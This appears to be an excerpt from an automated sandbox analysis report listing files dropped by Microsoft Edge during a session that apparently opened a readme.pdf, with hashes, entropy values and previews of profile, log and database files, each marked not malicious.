                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377790396853391","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377790396853391","location":5,"ma
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):213
                                                                                                                                                                                                      Entropy (8bit):2.7541301583060975
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:S8ltHlS+QUl1ASEGhTFljljljljljljljljl:S85aEFljljljljljljljljl
                                                                                                                                                                                                      MD5:046CC08D163FC4578CD1B77A5D0965AC
                                                                                                                                                                                                      SHA1:92F503E605C30974BAF385F1619F1269B81DEC57
                                                                                                                                                                                                      SHA-256:693A60684AA9FF4F01CB6027E9C938F4701C0C898AFC224A0776CB1E18E87166
                                                                                                                                                                                                      SHA-512:E8B1DF36A237BCBBAD897146CA247EDF75466B2A4030FEC620C46932B5C31137F2931CD2758534E4308AED3FB9CC40EDF2D7646A38530BCC5E6D7069C19A3B1F
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f...............
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):330
                                                                                                                                                                                                      Entropy (8bit):5.1499669314863095
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:jjYUxQL+q2PcNwi23oH+TcwtrQMxIFUt8mjYU4LSGKWZmw+mjYUjuQLVkwOcNwiE:xxQ+vLZYebCFUt8C4GGKW/+CCQV54ZYM
                                                                                                                                                                                                      MD5:C52A787B614FF85C8AC9468AA7000A99
                                                                                                                                                                                                      SHA1:D875D15E3CA7F2932E71474461CD89B850A888CA
                                                                                                                                                                                                      SHA-256:C2B9C3C126261AF6F02DA5DEE9A3ACE233561237F7D55C578AE6F13D5C31DE59
                                                                                                                                                                                                      SHA-512:65A7D02FB9DB8342FF7A91D67A93D066A6223D32C34A08C2BB5FBE1CE182F0798DCD6B35C881E60418CC1A816FF0B06E96D3060D79F24844C8043816A398CB20
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:2024/12/04-07:53:17.259 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/04-07:53:17.260 1eec Recovering log #3.2024/12/04-07:53:17.263 1eec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):330
                                                                                                                                                                                                      Entropy (8bit):5.1499669314863095
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:jjYUxQL+q2PcNwi23oH+TcwtrQMxIFUt8mjYU4LSGKWZmw+mjYUjuQLVkwOcNwiE:xxQ+vLZYebCFUt8C4GGKW/+CCQV54ZYM
                                                                                                                                                                                                      MD5:C52A787B614FF85C8AC9468AA7000A99
                                                                                                                                                                                                      SHA1:D875D15E3CA7F2932E71474461CD89B850A888CA
                                                                                                                                                                                                      SHA-256:C2B9C3C126261AF6F02DA5DEE9A3ACE233561237F7D55C578AE6F13D5C31DE59
                                                                                                                                                                                                      SHA-512:65A7D02FB9DB8342FF7A91D67A93D066A6223D32C34A08C2BB5FBE1CE182F0798DCD6B35C881E60418CC1A816FF0B06E96D3060D79F24844C8043816A398CB20
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:2024/12/04-07:53:17.259 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/04-07:53:17.260 1eec Recovering log #3.2024/12/04-07:53:17.263 1eec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2049
                                                                                                                                                                                                      Entropy (8bit):3.3339303766703283
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:30sSdsNoMWb1331PO5IjAvn+zEHc+pjAvn+HtIREhVlmyvf31n:3047UVPOEAvn++Avn+HtIRKVlmCn
                                                                                                                                                                                                      MD5:A5E4F56FDD1058F355AF4D82375D5AE3
                                                                                                                                                                                                      SHA1:30F9FB23061C72DCCF81AF658670C38BFB6E07AB
                                                                                                                                                                                                      SHA-256:B303DB7BD64718D4248B84FB1BDE7F218D590E95EC026CBA699F0034C5336D4D
                                                                                                                                                                                                      SHA-512:7F7C55DB2E7077435A9B5E61706D1DF5E4D0653B05FB7ED063C078BA8AFCB0CCF1605D6661770519C90C7F0E779BFC3E001676F68841410074B2892325648EBB
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:SNSS..........e..............e......"...e..............e..........e......./..e......./..e....!../..e..................................e/..e1..,.../..e$...47f72759_b1f1_49c7_876f_5439c71c238a......e......./..e....q.N...........e......e....................5..0......e&...{4B3AC14B-43E5-4896-86E8-9E7D502CE1B5}........e......./..e.........../..e....7...file:///C:/Users/user~1/AppData/Local/Temp/readme.pdf.............!.......................................................................................................O..Dq(..P..Dq(..@.......X.......................................................................v...7...f.i.l.e.:./././.C.:./.U.s.e.r.s./.F.R.O.N.T.D.~.1./.A.p.p.D.a.t.a./.L.o.c.a.l./.T.e.m.p./.r.e.a.d.m.e...p.d.f...................................8.......0.......8....................................................................... .......................................................................0...............x...............p.......Q..Dq(..R..Dq(................
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                      Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                      MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                      SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                      SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                      SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):358
                                                                                                                                                                                                      Entropy (8bit):5.16820336930431
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:jjYUc+q2PcNwi23oH+Tcwt7Uh2ghZIFUt8mjYU1Zmw+mjYUYuVkwOcNwi23oH+T8:xhvLZYebIhHh2FUt8C1/+CYe54ZYebIT
                                                                                                                                                                                                      MD5:BDADA1918FF8D9EF8BB48DB1775EF2F4
                                                                                                                                                                                                      SHA1:EA2497FB578B8BB1D931DC11B3D1D47043592BFE
                                                                                                                                                                                                      SHA-256:BDFFA754DBD8E95BA9544C920D29EE2CF62B5EA267C2274F53EF68AADD1EBE11
                                                                                                                                                                                                      SHA-512:26B50DC8D8218D3CD4850D07D30F2EF63F0242B6667806FD139F06A1F0B2222547D25EB9DC77AC1E1097067C89300A8F3DE85F24B14A2F98193554387AA27343
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:2024/12/04-07:53:17.001 1dd8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/04-07:53:17.002 1dd8 Recovering log #3.2024/12/04-07:53:17.039 1dd8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):358
                                                                                                                                                                                                      Entropy (8bit):5.16820336930431
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:jjYUc+q2PcNwi23oH+Tcwt7Uh2ghZIFUt8mjYU1Zmw+mjYUYuVkwOcNwi23oH+T8:xhvLZYebIhHh2FUt8C1/+CYe54ZYebIT
                                                                                                                                                                                                      MD5:BDADA1918FF8D9EF8BB48DB1775EF2F4
                                                                                                                                                                                                      SHA1:EA2497FB578B8BB1D931DC11B3D1D47043592BFE
                                                                                                                                                                                                      SHA-256:BDFFA754DBD8E95BA9544C920D29EE2CF62B5EA267C2274F53EF68AADD1EBE11
                                                                                                                                                                                                      SHA-512:26B50DC8D8218D3CD4850D07D30F2EF63F0242B6667806FD139F06A1F0B2222547D25EB9DC77AC1E1097067C89300A8F3DE85F24B14A2F98193554387AA27343
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:2024/12/04-07:53:17.001 1dd8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/04-07:53:17.002 1dd8 Recovering log #3.2024/12/04-07:53:17.039 1dd8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):270336
                                                                                                                                                                                                      Entropy (8bit):0.0018164538716206493
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:MsEllllkEthXllkl2zEZl77Mpl//:/M/xT02z621
                                                                                                                                                                                                      MD5:FE0696AC6AA4A01F27395056012C1802
                                                                                                                                                                                                      SHA1:03E5421EDEDAA4C571A8A22A21D3C7EF6E550709
                                                                                                                                                                                                      SHA-256:878B18721EC6CF64D768975FC9C45F06DEBAF2961FA5573576ED461244DC0F49
                                                                                                                                                                                                      SHA-512:15F8DD3C7958069AD506E3916D13EAFF4162C5CB8703B3A91817A6AB06DA6374C364A07AF0F73A58985E4D3B4DB2B631AD5566CD0E086EEFF8750D51239A262D
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):270336
                                                                                                                                                                                                      Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                      MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                      SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                      SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                      SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):270336
                                                                                                                                                                                                      Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                      MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                      SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                      SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                      SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):440
                                                                                                                                                                                                      Entropy (8bit):5.224217043059168
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:xGQ+vLZYebvqBQFUt8CTpGKW/+C6QV54ZYebvqBvJ:xG5lYebvZg8CdGKK6SoYebvk
                                                                                                                                                                                                      MD5:9E02A5CCC0506EB82520BE3E45421BAA
                                                                                                                                                                                                      SHA1:E971DABDFDEE02CFB635E1D59533386034D8A9FA
                                                                                                                                                                                                      SHA-256:10BE6B90EE2724A0BE76BC55BD104D43AD01E9DE5F19E30C325EA9CC02DDE76F
                                                                                                                                                                                                      SHA-512:3DF2DF0F70618C8D74CC4C86BC08D45C060BA407F5B1395F67CDF1E968D1F3CE5B6478FE2AC443BA5D618F733BB49C2ECE4395AEE3436478BFAC83732A393FF1
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:2024/12/04-07:53:17.425 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/04-07:53:17.439 1eec Recovering log #3.2024/12/04-07:53:17.465 1eec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):440
                                                                                                                                                                                                      Entropy (8bit):5.224217043059168
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:xGQ+vLZYebvqBQFUt8CTpGKW/+C6QV54ZYebvqBvJ:xG5lYebvZg8CdGKK6SoYebvk
                                                                                                                                                                                                      MD5:9E02A5CCC0506EB82520BE3E45421BAA
                                                                                                                                                                                                      SHA1:E971DABDFDEE02CFB635E1D59533386034D8A9FA
                                                                                                                                                                                                      SHA-256:10BE6B90EE2724A0BE76BC55BD104D43AD01E9DE5F19E30C325EA9CC02DDE76F
                                                                                                                                                                                                      SHA-512:3DF2DF0F70618C8D74CC4C86BC08D45C060BA407F5B1395F67CDF1E968D1F3CE5B6478FE2AC443BA5D618F733BB49C2ECE4395AEE3436478BFAC83732A393FF1
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:2024/12/04-07:53:17.425 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/04-07:53:17.439 1eec Recovering log #3.2024/12/04-07:53:17.465 1eec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):36864
                                                                                                                                                                                                      Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                      MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                      SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                      SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                      SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):80
                                                                                                                                                                                                      Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                      MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                      SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                      SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                      SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):428
                                                                                                                                                                                                      Entropy (8bit):5.211218245340643
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:ZQ+vLZYebvqBZFUt8vGKW/+gQV54ZYebvqBaJ:Z5lYebvyg8vGK4SoYebvL
                                                                                                                                                                                                      MD5:1E3EDEADC39F6D8DB619BC25A2ED1484
                                                                                                                                                                                                      SHA1:C8D98CB695E977AB61E8942F52BE33BEE288BE44
                                                                                                                                                                                                      SHA-256:4144B73A3E2A3B822E61F7BC2072FCC3DA838348DDE2567D56AD347A1CE57E9C
                                                                                                                                                                                                      SHA-512:9DD05DD7433B64FA0CA67788680F6A0CB5B7ACE2425C7A66C179FA87D7EF32E43E4AC1F9C290834680161255FD79BCEE7DF69F5D96E1E1713EBE7D11084A85EC
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:2024/12/04-07:53:35.305 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/04-07:53:35.306 1eec Recovering log #3.2024/12/04-07:53:35.309 1eec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
